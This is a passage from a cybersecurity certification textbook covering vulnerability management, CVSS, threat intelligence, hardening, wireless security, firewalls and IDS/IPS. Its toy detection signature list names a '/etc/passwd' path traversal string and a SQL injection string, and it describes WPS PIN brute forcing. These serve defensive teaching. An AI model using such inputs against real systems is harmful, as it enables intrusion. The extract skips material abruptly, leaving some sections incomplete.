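    ("libfoo", "1.2.0"): "EXAMPLE-2023-0001",
    ("libbar", "0.9.1"): "EXAMPLE-2023-0002",
}

# The organization's current software inventory (e.g., from an SBOM).
inventory = [("libfoo", "1.2.0"), ("libbar", "1.0.0"), ("libbaz", "2.1.3")]

# Flag every inventory entry that matches a known-vulnerable version.
findings = [(pkg, ver, known_vulns[(pkg, ver)])
            for pkg, ver in inventory if (pkg, ver) in known_vulns]
print(findings)  # only libfoo 1.2.0 matches a known advisory
```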
Threat Feeds
Another important element of vulnerability management is the use of threat feeds.
These are real-time, continuously updated sources of information about potential
threats and vulnerabilities, often gathered from multiple sources. By integrating
threat feeds into their vulnerability management practices, organizations can stay
aware of the latest risks and respond more swiftly.
Threat feeds are pivotal in vulnerability scanning by providing real-time, continuous
data about the latest vulnerabilities, exploits, and threat actors. These feeds serve
as a valuable resource for enhancing the organization’s threat intelligence and
enabling quicker identification and remediation of potential vulnerabilities. They
integrate data from various sources, including security vendors, cybersecurity
organizations, and open-source intelligence, to comprehensively view the threat
landscape.
Common threat feed platforms include AlienVault’s Open Threat Exchange
(OTX), IBM’s X-Force Exchange, and Recorded Future. These platforms gather,
analyze, and distribute information about new and emerging threats, providing
actionable intelligence that can be incorporated into an organization’s vulnerability
management practices and sometimes directly into security infrastructure tools to
provide up-to-the-minute protections.
Threat feeds significantly improve vulnerability identification by providing timely
information and context about new threats that traditional vulnerability scanning
does not provide. Threat feeds provide information that helps organizations
focus their remediation efforts on the most relevant and potentially damaging
vulnerabilities first. This proactive approach can significantly reduce the time
between discovering a vulnerability and its remediation, thus minimizing the
organization’s exposure to potential attacks.
IBM X-Force Exchange threat intelligence portal. (Image copyright 2019 IBM Security
exchange.xforce.ibmcloud.com.)
The outputs from the primary research undertaken by threat data feed providers
and academics can take three main forms:
• Behavioral Threat Research—narrative commentary describing examples of
attacks and TTPs gathered through primary research sources.
Threat data can be packaged as feeds that integrate with a security information
and event management (SIEM) platform. These feeds are usually described as
cyber threat intelligence (CTI) data. The data on its own is not a complete security
solution. To produce actionable intelligence, the threat data must be correlated with
observed data from customer networks. This type of analysis is often powered by
artificial intelligence (AI) features of the SIEM.
Threat intelligence platforms and feeds are supplied as one of three different
commercial models:
• Closed/proprietary—the threat research and CTI data is made available as
a paid subscription to a commercial threat intelligence platform. The security
solution provider will also make the most valuable research available early to
platform subscribers in the form of blogs, white papers, and webinars. Some
examples of such platforms include the following:
Information-Sharing Organizations
Threat feed information-sharing organizations are collaborative groups that
exchange data about emerging cybersecurity threats and vulnerabilities. These
organizations collect, analyze, and disseminate threat intelligence from various
sources, including their members, security researchers, and public sources.
Members of these organizations, often composed of businesses, government
entities, and academic institutions, can benefit from the shared intelligence by
gaining insights into the latest threats they might not have access to individually.
They can use this information to fortify their systems and respond swiftly to
emerging threats. Examples of such organizations include the Cyber Threat Alliance
and the Information Sharing and Analysis Centers (ISACs), which span various
industries. These organizations are crucial in enhancing collective cybersecurity
resilience and promoting a collaborative approach to tackling cyber threats.
Open-Source Intelligence
Open-source intelligence (OSINT) describes collecting and analyzing publicly
available information and using it to support decision-making. In cybersecurity
operations, OSINT is used to identify vulnerabilities and threat information by
gathering data from many sources such as blogs, forums, social media platforms,
and even the dark web. This can include information about new types of malware,
attack strategies used by cybercriminals, and recently discovered software
vulnerabilities. Security researchers can use OSINT tools to automatically collect and
analyze this information, identifying potential threats or vulnerabilities that could
impact their organization.
Some common OSINT tools include Shodan for investigating Internet-connected
devices, Maltego for visualizing complex networks of information, Recon-ng for
web-based reconnaissance activities, and theHarvester for gathering emails,
subdomains, hosts, and employee names from different public sources.
The OSINT Framework is a useful resource designed to help locate and organize tools
used to perform open-source intelligence. https://github.com/lockfale/osint-framework
OSINT can provide valuable context to aid in assessing risk levels associated with
a specific vulnerability. For example, newly discovered vulnerabilities that are
being actively exploited in the wild or discussed in hacking forums will need to be
prioritized for remediation. In this way, OSINT helps identify vulnerabilities and
plays a critical role in vulnerability management and threat assessment.
• Dark Web—sites, content, and services accessible only over a dark net. While
there are dark web search engines, many sites are hidden from them. Access to a
dark web site via its URL is often only available via “word of mouth” bulletin boards.
Using the TOR browser to view the AlphaBay market, now closed by law enforcement.
(Screenshot used with permission from Security Onion.)
Investigating these dark web sites and message boards is a valuable source of
counterintelligence. The anonymity of dark web services has made it easy for
investigators to infiltrate the forums and web stores that have been set up to
exchange stolen data and hacking tools. As adversaries react to this, they are
setting up new networks and ways of identifying law enforcement infiltration.
Consequently, dark nets and the dark web represent a continually shifting
landscape.
Please note that participating in illegal activities on the dark web is strictly prohibited.
To stay safe, it is important to exercise caution and follow legal and ethical guidelines
when exploring the dark web.
The dark web is generally associated with illicit activities and illegal content, but it
also has legitimate purposes.
Privacy and Anonymity—The dark web provides a platform for enhanced privacy
and anonymity. It allows users to communicate and browse the Internet without
revealing their identity or location, which can be valuable for whistleblowers,
journalists, activists, or individuals living under repressive government regimes.
Access to Censored Information—In countries with strict Internet censorship, the
dark web can be an avenue for accessing information that is otherwise blocked or
restricted. It enables individuals to bypass censorship and access politically sensitive
or controversial content.
Research and Information Sharing—Some academic researchers or cybersecurity
professionals may explore the dark web to gain insights into criminal activities and
analyze emerging threats to improve cybersecurity operations.
Bug Bounties
Bug bounty programs are another proactive strategy, in which organizations
incentivize the discovery and reporting of vulnerabilities by offering
rewards to external security researchers or “white hat” hackers. Both penetration
testing and bug bounty programs are proactive cybersecurity practices to identify
and mitigate vulnerabilities in a system or application. They both involve exploiting
vulnerabilities to understand their potential impact, with the difference lying
primarily in who conducts the testing and how it’s structured. Penetration testing
is typically performed by a hired team of professional ethical hackers within a
confined time frame, using a structured approach based on the organization’s
requirements. This approach allows for a focused, in-depth examination of specific
systems or applications and provides a predictable cost and timeline.
In contrast, bug bounty programs open the testing process to a global community
of independent security researchers. Rewards for finding and reporting
vulnerabilities incentivize these researchers. This approach can bring diverse skills
and perspectives to the testing process, potentially uncovering more complex or
obscure vulnerabilities.
An organization may choose penetration testing for a more controlled, targeted
assessment, especially when testing specific components or meeting certain
compliance requirements. A bug bounty program might be preferred when
seeking a more extensive range of testing, leveraging the collective skills of a
global community. However, many organizations see the value in both and use a
combination of pen testing and bug bounty programs to ensure comprehensive
vulnerability management.
The HackerOne platform is designed to support security researchers and promote responsible
disclosure of vulnerabilities. (Screenshot used with permission from HackerOne.)
Auditing
Auditing is an essential part of vulnerability management. Where product audits
are focused on specific features, such as application code, system/process audits
interrogate the wider use and deployment of products, including supply chain,
configuration, support, monitoring, and cybersecurity. Security audits assess an
organization’s security controls, policies, and procedures, often using standards
like ISO 27001 or the NIST Cybersecurity Framework as benchmarks. These audits
can identify technical vulnerabilities and operational weaknesses impacting an
organization’s security posture.
Cybersecurity audits are comprehensive reviews designed to ensure an
organization’s security posture aligns with established standards and best practices.
There are various types of cybersecurity audits, including compliance audits, which
assess adherence to regulations like GDPR or HIPAA; risk-based audits, which
identify potential threats and vulnerabilities in an organization’s systems and
processes; and technical audits, which delve into the specifics of the organization’s
IT infrastructure, examining areas like network security, access controls, and data
protection measures.
Penetration testing fits into cybersecurity audit practices as a critical component of
a technical audit as it provides a practical assessment of the organization’s defenses
by simulating real-world attack scenarios. Rather than simply evaluating policies or
configurations, penetration tests actively seek exploitable vulnerabilities, providing
a clear picture of what an attacker might achieve. The findings from these tests are
then used to improve the organization’s security controls and mitigate identified
risks.
Penetration tests also play an important role in compliance audits, as many
regulations require organizations to conduct regular penetration testing as part
of their cybersecurity program. For instance, the Payment Card Industry Data
Security Standard (PCI DSS) mandates annual and proactive penetration tests for
organizations handling cardholder data.
Review Activity:
Vulnerability Identification Methods
Topic 8D
Vulnerability Analysis and Remediation
The CVE dictionary provides the principal input for NIST’s National Vulnerability
Database (nvd.nist.gov). The NVD supplements the CVE descriptions with additional
analysis, a criticality metric calculated using the Common Vulnerability Scoring
System (CVSS), and fix information.
CVSS is maintained by the Forum of Incident Response and Security Teams
(first.org/cvss). CVSS metrics generate a score from 0 to 10 based on characteristics
of the vulnerability, such as whether it can be triggered remotely or needs local
access, whether user intervention is required, and so on. The scores are banded
into descriptions too:
Score Description
0.1+ Low
4.0+ Medium
7.0+ High
9.0+ Critical
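The banding in the table can be expressed as a simple lookup. The following Python sketch maps a CVSS base score to its qualitative rating; note that in CVSS v3 a score of exactly 0.0 is rated "None", which sits below the table's Low band.

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS base score (0.0-10.0) to its qualitative severity band."""
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"

print(cvss_severity(3.1), cvss_severity(7.5), cvss_severity(9.8))
```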
Vulnerability Analysis
Vulnerability analysis is critical in supporting several key aspects of an organization’s
cybersecurity strategy, including prioritization, vulnerability classification,
considerations of exposure, organizational impact, and risk tolerance contexts.
Prioritization
Vulnerability analysis helps prioritize remediation efforts by identifying the most
critical vulnerabilities that pose the most significant risk to an organization.
Prioritization is typically based on factors such as the severity of the vulnerability,
the ease of exploitation, and the potential impact of an attack. Prioritizing
vulnerabilities helps an organization focus limited resources on addressing the
most significant threats first.
Classification
Vulnerability analysis aids in vulnerability classification, categorizing vulnerabilities
based on their characteristics, such as the type of system or application affected,
the nature of the vulnerability, or the potential impact. Classification can help clarify
the scope and nature of an organization’s threats.
Exposure Factor
Vulnerability analysis must also consider exposure factors, like the accessibility
of a vulnerable system or data, and environmental factors, like the current threat
landscape or the specifics of the organization’s IT infrastructure. These factors can
significantly influence the likelihood of a vulnerability being exploited and directly
impact its overall risk level.
Exposure factor (EF) represents the extent to which an asset is susceptible to
being compromised or impacted by a specific vulnerability, and it helps assess the
potential impact or loss that could occur if the vulnerability is exploited. Factors
might include weak authentication mechanisms, inadequate network segmentation,
or insufficient access control methods.
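In quantitative risk assessment, the exposure factor feeds directly into the single loss expectancy (SLE) calculation: SLE = asset value × EF. A brief Python sketch, with purely illustrative figures:

```python
# Exposure factor (EF): the fraction of an asset's value expected to be
# lost if a specific vulnerability is exploited. Figures are illustrative.
asset_value = 200_000      # value of the asset, in dollars
exposure_factor = 0.25     # 25% of the asset's value is at risk

# Single loss expectancy: expected loss from one occurrence.
single_loss_expectancy = asset_value * exposure_factor
print(single_loss_expectancy)
```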
Impacts
Vulnerability analysis assesses the potential organizational impact of vulnerabilities.
This could be financial loss, reputational damage, operational disruption, or
regulatory penalties. Understanding this impact is crucial for making informed
decisions about risk mitigation.
Environmental Variables
Several environmental variables play a significant role in influencing vulnerability
analysis. One of the primary environmental factors is the organization’s IT
infrastructure, which includes the hardware, software, networks, and systems in
use. These components’ diversity, complexity, and age can affect the number and
types of vulnerabilities present. For instance, legacy systems may have known
unpatched vulnerabilities, while new, emerging technologies might introduce
unknown vulnerabilities.
The external threat landscape is another crucial environmental factor. The
prevalence of certain types of attacks or the activities of specific threat actors can
affect the likelihood of particular vulnerabilities being exploited. For example, if
ransomware attacks are rising within the medical industry, vulnerabilities that are
exploited as part of those attacks must be prioritized in that sector.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Risk Tolerance
Vulnerability analysis must align with an organization’s risk tolerance. Risk
tolerance refers to the level of risk an organization is willing to accept, and this can
vary greatly depending on the organization’s size, industry, regulatory environment,
and strategic objectives. By aligning vulnerability analysis with risk tolerance, an
organization can ensure that its vulnerability management efforts align with its
overall risk management strategy.
Remediation Practices
• Patching is one of the most straightforward and effective remediation practices.
It involves applying updates and patches to software or systems to fix known
vulnerabilities. Patching helps prevent attackers from exploiting known
vulnerabilities, improving an organization’s security posture. Robust, centralized
patch management processes are essential to ensure patches are applied
promptly and consistently. A patch management program focuses on regularly
installing software patches to address vulnerabilities and improve security in
various types of systems, including operating systems, network devices (routers,
switches, and firewalls), databases, web applications, desktop applications (email
clients, web browsers, and office productivity applications), and other software
applications deployed within an organization’s IT environment.
Validation
Validating vulnerability remediation is critically important for several key reasons.
Validation ensures that the remediation actions have been implemented correctly
and function as intended. Despite best intentions, human error or technical
problems can frequently lead to incomplete or incorrect implementation of fixes.
These issues go unnoticed without validation, exposing the organization to the
same vulnerability it originally sought to address.
Validation helps confirm that the remediation has not inadvertently introduced new
issues or vulnerabilities. For example, a patch may interfere with other software or
systems, or a configuration change could expose new security gaps.
Also, validation provides a measure of accountability, ensuring that responsible
parties have adequately addressed identified vulnerabilities. This is especially
important in larger organizations where multiple teams or individuals may be
involved in the remediation process.
• Re-scanning involves performing additional vulnerability scans after
remediation actions have been implemented. The re-scan aims to determine if
the vulnerabilities identified in the initial scan have been resolved. If the same
vulnerabilities are not identified in the re-scan, it strongly indicates that the
remediation efforts were successful.
Reporting
Vulnerability reporting is a crucial aspect of vulnerability management and is
critical in maintaining an organization’s cybersecurity posture. A comprehensive
vulnerability report highlights the existing vulnerabilities and ranks them based
on their severity and potential impact on the organization’s assets, enabling the
management to prioritize remediation efforts effectively.
The Common Vulnerability Scoring System (CVSS) provides a standardized method
for rating the severity of vulnerabilities and includes metrics such as exploitability,
impact, and remediation level. By using CVSS, organizations can compare and
prioritize vulnerabilities consistently.
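The CVSS qualitative severity ratings can be sketched as a simple lookup. The score bands below follow the CVSS v3.1 specification; the findings dictionary is illustrative, not real scan output.

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.1 base score (0.0-10.0) to its qualitative rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"

# Rank a set of scan findings by severity (scores are illustrative).
findings = {"CVE-A": 9.8, "CVE-B": 5.3, "CVE-C": 3.1}
ranked = sorted(findings.items(), key=lambda kv: kv[1], reverse=True)
```

Sorting findings by base score in this way gives a consistent, repeatable remediation priority order.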
Review Activity:
Vulnerability Analysis and
Remediation
A vulnerability scan reports that a vulnerability affecting CentOS Linux is
present on a host, but you have established that the host is not running
CentOS. What type of scanning error event is this?
Lesson 8
Summary
• Run scans regularly and review the results to identify false positives and false
negatives, using log review and additional CVE information to validate results if
necessary.
• Consider implementing penetration testing exercises, ensuring that these are set
up with a clear project scope.
Capabilities
LESSON INTRODUCTION
Secure baselines, hardening, wireless security, and network access control
are fundamental concepts in cybersecurity. Secure baselines establish a set of
standardized security configurations for different types of IT assets, such as
operating systems, networks, and applications. These baselines represent a starting
point for security measures, offering a defined minimum level of security that all
systems must meet.
Hardening is the process of reducing system vulnerabilities to make IT resources
more resilient to attacks. It involves disabling unnecessary services, configuring
appropriate permissions, applying patches and updates, and ensuring adherence to
secure configurations defined by the secure baselines. Wireless security describes
the measures to protect wireless networks from threats and unauthorized access.
This includes using robust encryption (like WPA3), secure authentication methods
(like RADIUS in enterprise mode), and monitoring for rogue access points.
Network access control (NAC) is a security solution that enforces policy on devices
seeking to access network resources. It identifies, categorizes, and manages
the activities of all devices on a network, ensuring they comply with security
policies before granting access and continuously monitoring them while they are
connected. These concepts form a multilayered security approach to protect an
organization’s IT infrastructure from various cyber threats.
Lesson Objectives
In this lesson, you will do the following:
• Describe the importance of secure baselines.
Topic 9A
Network Security Baselines
Hardening Concepts
Network equipment, software, and operating systems use default settings from
the developer or manufacturer, which attempt to balance ease of use with security.
Default configurations are an attractive target for attackers as they usually include
well-documented credentials, allow simple passwords, use insecure protocols,
and many other problematic settings. By leaving these default settings in place,
organizations increase the likelihood of successful cyberattacks. Therefore, it’s
crucial to change these default settings to improve security.
Hardening describes the methods to improve a device’s security by changing its
default configuration, often by implementing the recommendations in published
secure baselines.
• Implement Access Control Lists (ACLs) to restrict access to the router or switch
to only required devices and networks.
• Enable Logging and Monitoring to help identify issues like repeated login
failures, configuration changes, and many others.
• Configure Port Security to limit the devices that can connect to a switch
port, preventing unauthorized access.
• Disable Unnecessary Services to reduce the attack surface of the server. Each
service running on a server represents a potential point of entry for an attacker.
• Apply the Least Privilege Principle to limit each user to the minimum
privileges necessary to perform a function, reducing the impact of a
compromised account.
• Use Firewalls and Intrusion Detection Systems (IDS) to help block or alert on
malicious activity.
• Enable Logging and Monitoring to help identify issues like repeated login
failures and configuration changes, similar to the benefits for network
equipment.
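The hardening checklist above can be sketched as an automated compliance check. The baseline keys and device settings below are hypothetical examples, not drawn from any published secure baseline.

```python
# Hypothetical secure-baseline requirements for a network device.
BASELINE = {
    "default_password_changed": True,   # no well-documented credentials
    "telnet_enabled": False,            # insecure protocol must be off
    "logging_enabled": True,            # support monitoring and auditing
    "port_security_enabled": True,      # limit devices per switch port
}

def audit(device_config: dict) -> list[str]:
    """Return the baseline settings that a device fails to meet."""
    return [setting for setting, required in BASELINE.items()
            if device_config.get(setting) != required]

device = {
    "default_password_changed": True,
    "telnet_enabled": True,             # violation
    "logging_enabled": True,
    "port_security_enabled": False,     # violation
}
failures = audit(device)
```

Tools such as Ansible or Group Policy apply the same idea at scale: compare each device against the baseline and report or remediate the deviations.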
The 5 GHz band has more space to configure nonoverlapping channels. Also note that
a WAP can use bonded channels to improve bandwidth, but this increases risks from
interference.
Example output from Lizard Systems’ Wi-Fi Scanner tool. (Screenshot courtesy of Lizard Systems.)
These readings are combined and analyzed to produce a heat map, showing
where a signal is strong (red) or weak (green/blue), which channels are in use,
and how they overlap. This data is then used to optimize the design by adjusting
transmit power to reduce a WAP’s range, changing the channel on a WAP, adding a
new WAP, or physically moving a WAP to a new location.
Wireless Encryption
As well as the site design, a wireless network must be configured with security
settings. Without encryption, anyone within range can intercept and read packets
passing over the wireless network. Security choices are determined by device
support for the various Wi-Fi security standards, by the type of authentication
infrastructure, and by the purpose of the WLAN. Security standards determine which
cryptographic protocols are supported, the means of generating the encryption key,
and the available methods for authenticating wireless stations when they try to join
(or associate with) the network.
The first version of Wi-Fi Protected Access (WPA) was designed to fix critical
vulnerabilities in the earlier wired equivalent privacy (WEP) standard. Like WEP,
version 1 of WPA uses the RC4 stream cipher but adds a mechanism called the
Temporal Key Integrity Protocol (TKIP) to make it stronger.
Configuring a TP-LINK SOHO access point with wireless encryption and authentication settings.
In this example, the 2.4 GHz band allows legacy connections with WPA2-Personal security, while
the 5 GHz network is for 802.11ax (Wi-Fi 6) capable devices using WPA3-SAE authentication.
(Screenshot used with permission from TP-Link Technologies.)
Unfortunately, WPS is vulnerable to a brute force attack. While the PIN is eight
digits long, one digit is a checksum and the rest are verified as two separate PINs
of four and three digits. These separate PINs are many orders of magnitude
simpler to brute force, typically requiring just hours to crack. On some models,
disabling WPS through the admin interface does not actually disable the protocol,
or there is no option to disable it. Some APs can lock out an intruder if a brute force
attack is detected, but in some cases, the attack can just be resumed when the
lockout period expires.
To counter this, the lockout period can be increased. However, this can leave APs
vulnerable to a denial of service (DoS) attack. When provisioning a WAP, it is essential to
verify what steps the manufacturer has taken to make their WPS implementation secure
and to use the required device firmware level identified as secure.
The Easy Connect method, announced alongside WPA3, is intended to replace WPS
as a method of securely configuring client devices with the information required to
access a Wi-Fi network. Easy Connect is a brand name for the Device Provisioning
Protocol (DPP).
Each participating device must be configured with a public/private key pair. Easy
Connect uses quick response (QR) codes or near-field communication (NFC) tags
to communicate each device’s public key. A smartphone is registered as an Easy
Connect configurator app and associated with the WAP using its QR code. Each
client device can then be associated by scanning its QR code or NFC tag in the
configurator app. As well as fixing the security problems associated with WPS, this
is a straightforward means of configuring headless Internet of Things (IoT) devices
with Wi-Fi connectivity.
• Enhanced Open—encrypts traffic between devices and the access point, even
without a password, which increases privacy and security on open networks.
Wi-Fi performance also depends on device support for the latest 802.11 standards. The
most recent generation (802.11ax) is being marketed as Wi-Fi 6. The earlier standards
are retroactively named Wi-Fi 5 (802.11ac) and Wi-Fi 4 (802.11n). The performance
standards are developed in parallel with the WPA security specifications. Most Wi-Fi 6
devices and some Wi-Fi 5 and Wi-Fi 4 products should support WPA3 either natively or
with a firmware/driver update.
All types of Wi-Fi personal authentication have been shown to be vulnerable to
dictionary or brute force attacks against the passphrase. The passphrase should be
at least 14 characters long to mitigate the risk of cracking.
The configuration interfaces for access points can use different labels for these methods.
You might see WPA2-Personal and WPA3-SAE rather than WPA2-PSK and WPA3-
Personal, for example. Additionally, an access point can be configured for WPA3 only or
with support for legacy WPA2 (WPA3-Personal Transition mode). Researchers have
already found flaws in WPA3-Personal, one of which relies on a downgrade attack to
use WPA2 (wi-fi.org/security-update-april-2019).
Advanced Authentication
Wireless enterprise authentication modes, such as WPA2/WPA3-Enterprise,
include several essential components designed to improve security for corporate
wireless networks. One important element is 802.1x authentication, which provides
a port-based network access control framework, ensuring that only authenticated
devices are granted network access. Typically, 802.1x requires an authentication
server such as RADIUS (Remote Authentication Dial-In User Service), which verifies
the credentials of users or devices trying to connect to the network.
2. The NAS prompts the user for their authentication credentials. RADIUS
supports PAP, CHAP, and EAP. Most implementations now use EAP, as PAP
and CHAP are not secure. If EAP credentials are required, the NAS enables the
supplicant to transmit EAP over LAN (EAPoL) data, but not any other type of
network traffic.
3. The supplicant submits the credentials as EAPoL data. The RADIUS client uses
this information to create an Access-Request packet, encrypted using the
shared secret, and sends it to the AAA server.
4. The AAA server decrypts the Access-Request using the shared secret. If
the request is valid, the server processes the credentials, typically responding
with an Access-Challenge to continue the EAP exchange.
5. Challenge and response messages are relayed between the supplicant and the
AAA server via the NAS until the server can authenticate the supplicant or
reject the attempt.
6. At the end of this exchange, if the supplicant is authenticated, the AAA server
sends an Access-Accept packet to the NAS, which then permits the supplicant
to access the network.
Optionally, the NAS can use RADIUS for accounting (logging). Accounting uses port
1813. The accounting server can be different from the authentication server.
Defining policy violations in PacketFence Open Source NAC. (Screenshot used with permission
from packetfence.org.)
PacketFence supports the use of several scanning techniques, including vulnerability scanners,
such as Nessus and OpenVAS, Windows Management Instrumentation (WMI) queries, and log
parsers. (Screenshot used with permission from packetfence.org.)
Review Activity:
Network Security Baselines
Topic 9B
Network Security Capability
Enhancement
Sample firewall rules configured on IPFire. This ruleset allows any HTTP, HTTPS, or SMTP traffic to
specific internal addresses. (Screenshot used with permission from IPFire)
Each rule can specify whether to block or allow traffic based on several parameters,
often referred to as tuples. If you think of each rule being like a row in a database,
the tuples are the columns. For example, in the previous screenshot, the
tuples include Protocol, Source (address), (Source) Port, Destination (address),
(Destination) Port, and so on.
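The tuple model can be sketched as first-match rule evaluation. The rules below are illustrative and are not the ones shown in the IPFire screenshot.

```python
# Each rule is a set of tuple values plus an action; evaluation is
# first-match. The ruleset below is illustrative only.
RULES = [
    {"proto": "tcp", "dst_port": 80, "action": "allow"},   # HTTP
    {"proto": "tcp", "dst_port": 443, "action": "allow"},  # HTTPS
    {"proto": "tcp", "dst_port": 25, "action": "allow"},   # SMTP
]
DEFAULT_ACTION = "block"  # implicit deny for unmatched traffic

def evaluate(proto: str, dst_port: int) -> str:
    """Return the action of the first rule matching the packet."""
    for rule in RULES:
        if rule["proto"] == proto and rule["dst_port"] == dst_port:
            return rule["action"]
    return DEFAULT_ACTION
```

Note the implicit deny: any packet that matches no rule falls through to the default block action, which is the recommended posture for inbound traffic.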
Even the simplest packet-filtering firewall can be complex to configure securely. It
is essential to create a written policy describing what a filter ruleset should do and
to test the configuration as far as possible to ensure that the ACLs you have set
up work as intended. Also, test and document changes made to ACLs. Some other
basic principles include the following:
• Block incoming requests from internal or private IP addresses (that have
obviously been spoofed).
• Block incoming requests from protocols that should only function at a local
network level, such as ICMP, DHCP, or routing protocol traffic.
• Take the usual steps to secure the hardware on which the firewall is running and
to secure its management interface.
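The first principle, dropping inbound packets that claim an internal or private source, can be sketched with Python's standard ipaddress module:

```python
import ipaddress

def is_spoofed_ingress(src_ip: str) -> bool:
    """An inbound packet arriving from the Internet should never carry
    a private (RFC 1918), loopback, or link-local source address."""
    addr = ipaddress.ip_address(src_ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local
```

A perimeter firewall applies exactly this test on its external interface, discarding packets whose source address could only have been spoofed.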
For instance, a firewall rule can be specifically designed to permit or deny traffic
based on the TCP or UDP port numbers that a service operates on. If a web server
on a network should only allow incoming HTTP and HTTPS traffic, rules could be set
up to allow traffic only on ports 80 (HTTP) and 443 (HTTPS), the standard ports for
these services. Similarly, rules can be defined to restrict certain protocols such as
FTP or SSH from entering the network if they are not needed, thereby reducing the
potential attack surface.
Additionally, you can use firewall rules to restrict outgoing traffic to prevent certain
types of communication from inside the network. For instance, a rule can block all
outgoing traffic to port 25 (SMTP) to prevent a compromised machine within the
network from sending out spam emails.
Screened Subnet
A screened subnet, also known as a perimeter network, creates an additional
layer of protection between an organization’s internal network and the Internet.
A screened subnet acts as a neutral zone, separating public-facing servers from
sensitive internal network resources to reduce the exposure of the internal network
resource to external threats. In practical terms, the screened subnet often hosts
web, email, DNS, or FTP services. These systems must typically be accessible from
the public Internet but isolated from sensitive internal systems to limit the impact of
a breach of one of these services. By placing these servers in the screened subnet,
an organization can limit the damage if these servers are compromised.
Firewalls are typically used to create and control the traffic to and from the
screened subnet. The first firewall, between the Internet and the screened subnet,
is configured to allow traffic to the services hosted in the screened subnet.
The second firewall, between the screened subnet and the internal network, is
configured to block most (practically all) traffic from the screened subnet to the
internal network. A screened subnet is a fundamental part of a network’s security
architecture and an important example of network segmentation as a type of
security control.
In contrast, intrusion prevention systems (IPS), like Suricata, are proactive security
tools that detect potential threats and take action to prevent or mitigate them. An
IPS identifies a threat using methods similar to an IDS and can block traffic from the
offending source, drop malicious packets, or reset connections to disrupt an attack.
While this can immediately prevent damage, there is a risk of false positives leading
to blocking legitimate traffic.
Important IDS & IPS tools include the following:
• Snort is one of the most well-known IDS tools. It uses a rule-driven language,
which combines the benefits of signature, protocol, and anomaly-based
inspection methods, providing robust detection capabilities. Snort’s open-source
nature and widespread adoption have led to a large community contributing
rules and configurations, making it a versatile tool for various environments.
The Security Onion Alerts dashboard displaying several alerts captured using the Emerging
Threats (ET) ruleset and Suricata. (Screenshot used with permission from Security Onion.)
Signature-Based Detection
Signature-based detection (or pattern-matching) means that the engine is loaded
with a database of attack patterns or signatures. If traffic matches a pattern then
the engine generates an incident.
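A minimal sketch of pattern-matching detection follows. The signatures are invented for illustration and are far simpler than real Snort or Suricata rules, which also match on protocol, ports, and direction.

```python
# Toy signature database: byte pattern -> alert message (illustrative).
SIGNATURES = {
    b"/etc/passwd": "Possible path traversal attempt",
    b"' OR '1'='1": "Possible SQL injection attempt",
}

def inspect(payload: bytes) -> list[str]:
    """Generate an alert for every signature found in the payload."""
    return [msg for pattern, msg in SIGNATURES.items() if pattern in payload]

alerts = inspect(b"GET /../../etc/passwd HTTP/1.1")
```

The limitation is also visible here: signature-based detection only catches patterns already in the database, which is why the feed must be updated regularly.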
A Snort rules file supplied by the open-source Emerging Threats community feed.
The signatures and rules (often called plug-ins or feeds) powering intrusion
detection need to be updated regularly to provide protection against the latest
threat types. Commercial software requires a paid-for subscription to obtain
the updates. It is important to configure software to update only from valid
repositories, ideally using a secure connection method such as HTTPS.
• Network traffic analysis (NTA)—products that are closer to IDS and NBAD in
that they apply analysis techniques only to network streams rather than to
multiple network and log data sources.
Often behavioral- and anomaly-based detection are taken to mean the same
thing (in the sense that the engine detects anomalous behavior). This may not
always be the case. Anomaly-based detection can also mean specifically looking
for irregularities in the use of protocols. For example, the engine may check
packet headers or the exchange of packets in a session against RFC standards and
generate an alert if they deviate from strict RFC compliance.
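Protocol anomaly detection of this kind can be sketched as a sanity check against the TCP specification. The example flags a segment with both SYN and FIN set, a combination that never occurs in legitimate traffic:

```python
# TCP flag bits, per RFC 9293 (originally RFC 793).
FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10

def is_anomalous_flags(flags: int) -> bool:
    """Flag combinations that violate the TCP state machine and are
    typically only seen in crafted scan or evasion packets."""
    if flags & SYN and flags & FIN:   # SYN+FIN never occurs legitimately
        return True
    if flags == 0:                    # "null" segment: no flags at all
        return True
    return False
```

Real engines apply many such checks across headers and whole sessions, but each check has this same shape: compare observed fields against what the standard permits.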
Trend Analysis
Trend analysis is a critical aspect of managing intrusion detection systems (IDS)
and intrusion prevention systems (IPS) as it aids in understanding an environment
over time, helping to identify patterns, anomalies, and potential threats. Security
analysts can identify patterns and trends that indicate ongoing or growing threats
by tracking events and alerts. For example, an increase in alerts related to a specific
attack may suggest that a network is being targeted for attack or that a vulnerability
is being actively exploited. Trending can also help in tuning IDS/IPS systems.
Over time, security analysts can identify false positives or unnecessary alerts that
appear frequently. These alerts can be tuned down so analysts can focus on more
important alerts.
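Trending can be sketched by counting alerts per signature across reporting periods. The alert log below is invented for illustration:

```python
from collections import Counter

# (day, signature) pairs from an invented alert log.
alert_log = [
    ("Mon", "ET EXPLOIT SMB"), ("Mon", "ET SCAN Nmap"),
    ("Tue", "ET EXPLOIT SMB"), ("Tue", "ET EXPLOIT SMB"),
    ("Wed", "ET EXPLOIT SMB"), ("Wed", "ET EXPLOIT SMB"),
    ("Wed", "ET EXPLOIT SMB"),
]

counts = Counter(alert_log)
smb_trend = [counts[(day, "ET EXPLOIT SMB")] for day in ("Mon", "Tue", "Wed")]
# A strictly rising count suggests a growing or targeted campaign.
rising = all(a < b for a, b in zip(smb_trend, smb_trend[1:]))
```

In practice a SIEM performs this aggregation over much longer windows, but the principle is the same: a rising per-signature count is a signal to investigate and tune.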
Trending data can contribute to operational security strategies by identifying
common threats and frequently targeted systems. This approach highlights areas
of weakness that need attention, either through changes in security policy or
investment in additional security tools and training.
Web Filtering
Web filtering is essential to cybersecurity operations, playing a pivotal role in
safeguarding an organization’s network. Its primary function is to block users from
accessing malicious or inappropriate websites, thereby protecting the network from
potential threats. Web filters analyze web traffic, often in real time, and can restrict
access based on various criteria such as URL, IP address, content category, or even
specific keywords.
One of the key benefits of web filtering is the prevention of malware, including
ransomware and phishing attacks, which often originate from malicious websites.
